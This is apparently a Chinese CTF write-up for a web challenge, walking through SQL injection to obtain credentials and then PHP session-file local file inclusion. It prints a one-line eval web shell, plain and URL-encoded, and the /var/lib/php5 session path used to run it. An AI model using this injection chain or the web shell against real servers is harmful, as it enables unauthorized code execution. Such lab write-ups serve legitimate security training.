当前位置:网站首页>小学期,第三场-下午:WEB_sessionlfi
小学期,第三场-下午:WEB_sessionlfi
2022-06-30 19:06:00 【Part 02】
扫出
login.php
table.php
login.php 源码有提示 table.php?id
table.php 有注入报错
如果没有提示也可以 fuzz 出
通过简单 sql 注入得到 账号-密码
进入 home.php

可以读文件

读不了 /flag.txt

抓包

user_pref 的值为我们输入的值,有漏洞
php 5.4.6服务端生成的session id
例如:
sess_00nrqa20hjrlaiac0eu726i4q5
sess_89j9ifuqrbplk0rti2va2k1ha0
sess_g2rv1kd6ijsj6g6c9jq5mqglv5
响应包可以看到服务器用 ubuntu
![]()
Ubuntu 默认 session 会话:
php5 sessions in /var/lib/php5

确实可以访问到
把小马 URL 全字符编码
<?php eval($_GET[1]);?>
%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%47%45%54%5b%31%5d%29%3b%3f%3e
![]()

%20 为空格,连接 /

执行成功,接下来读取就行
边栏推荐
猜你喜欢

History, selection strategy and in-depth evaluation of note taking software

派尔特医疗在港交所招股书二次“失效”,上市计划实质性延迟

Small notes - integer improvement (C language)

SQL continuous login problem

4.3寸触控屏12路控制端口可编程网络中控支持5台中控主机相互备份

ArcGIS no plug-in load (no offset) day map
![[multithreading] use the thread pool to implement a simple thread pool](/img/24/ad3ced1d4aebde3f2233b04752bead.png)
[multithreading] use the thread pool to implement a simple thread pool

台湾SSS鑫创SSS1700替代Cmedia CM6533 24bit 96KHZ USB音频编解码芯片

sql连续登录问题

超视频时代的音视频架构建设|Science和英特尔联袂推出“架构师成长计划”第二季
随机推荐
《微信小程序-基础篇》带你了解小程序中的生命周期(二)
项目配置了eslint,编辑器没有关闭eslint功能的情况下,eslint没有生效
Temperature measuring instrument based on STM32 single chip microcomputer
Whether the SQL is indexed
2022 最新 JCR正式发布全球最新影响因子名单(前600名)
当我们在看待产业互联网的时候,总是会站在消费互联网的对立面来看待它
微信小程序快速入门 --项目介绍
composer
ROS advertisement data publishing tips - latch configuration
【DesignMode】工厂模式 (factory pattern)
How to use xUnit framework to maintain test cases?
A detailed explanation of the implementation principle of go Distributed Link Tracking
Abaqus 2022软件安装包和安装教程
Task01:初识数据库与SQL(笔记1)
Friends in Guangzhou can join us if they have the opportunity
Kubernetes为什么会赢,容器圈的风云变幻!
配置服务器环境
【NLP】【TextCNN】 文本分类
There are three ways to create instances by reflection (2022.6.6-6.12)
为什么越来越多的人选择云渲染?